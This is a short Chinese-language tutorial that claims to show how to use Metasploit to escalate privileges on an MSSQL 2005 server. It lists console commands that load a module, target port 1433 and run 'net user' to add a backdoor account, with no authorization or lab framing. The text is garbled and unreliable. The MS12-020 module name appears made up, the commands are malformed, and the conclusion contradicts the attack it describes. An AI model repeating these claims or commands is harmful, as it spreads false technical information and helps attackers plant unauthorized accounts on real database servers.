MSF无限开启MSSQL服务器的提权之门（msf对mssql提权）

MSF（Metasploit Framework）是一套非常优秀的攻击框架，不仅可以帮助我们在渗透测试中快速有效的探测目标系统，而且具备了极其强大的提权、利用能力。目前开发的越来越多的操作系统，特权的提高，安全威胁也加大，想要更好的安全管理就必须增加额外的设置，而MSF就是其中重要的一支解决方案。

MSSQL（Microsoft SQL Server）是微软提供的关系型数据库，它可以用于存储、处理和管理各种数据类型，为用户提供高效可靠的基础支持服务，MSSQL已经成为当今企业数据库技术要求中必不可少的一部分。

为了保护MSSQL服务器，需要管理员正确的设置相应的权限，以免发生未授权访问的危害。MSF提供了一种可用的方法，可以无限地提升MSSQL服务器的特权。通过MSF可以模糊搜索出MSSQL服务器的漏洞，并构建一个漏洞的攻击模型，尝试利用漏洞提升账户的特权，从而可以实现“一键开启”MSSQL服务器的权限。

下面以MSF脚本ms12-020_mssql_noauthentication作例，针对微软MSSQL2005提供一个简单的脚本，来演示如何快速利用MSF提权MSSQL服务器。

首先，打开MSF控制台，首先执行：

msf > use exploit / windows / mssql / ms12-020_mssql_noauthentication

指定服务器地址，修改RHOST

msf exploit ( mssql / ms12-020_mssql_noauthentication )> set RHOST  

指定shell生成模式，修改PAYLOAD

msf exploit ( mssql / ms12-020_mssql_noauthentication )> PAYLOAD windows / exec 

设置服务器地址和端口

msf exploit ( mssql / ms12-020_mssql_noauthentication )> set RPORT 1433 

设置执行脚本

msf exploit ( mssql / ms12-020_mssql_noauthentication )> set CMD net user exploit_user pwd123 / add 

此时已经准备就绪，可以执行命令

msf exploit ( mssql / ms12-020_mssql_noauthentication )> exploit 

最终会看到一个新建的用户，在MSSQL服务器上成功提权，从而可以无限开启MSSQL服务器的权限

综上所述，MSF提供了一个简单有效的提权方法，让MSSQL服务器可以安全有效的运行。但是，同时也需要管理员对系统进行安全防御，保护安全环境。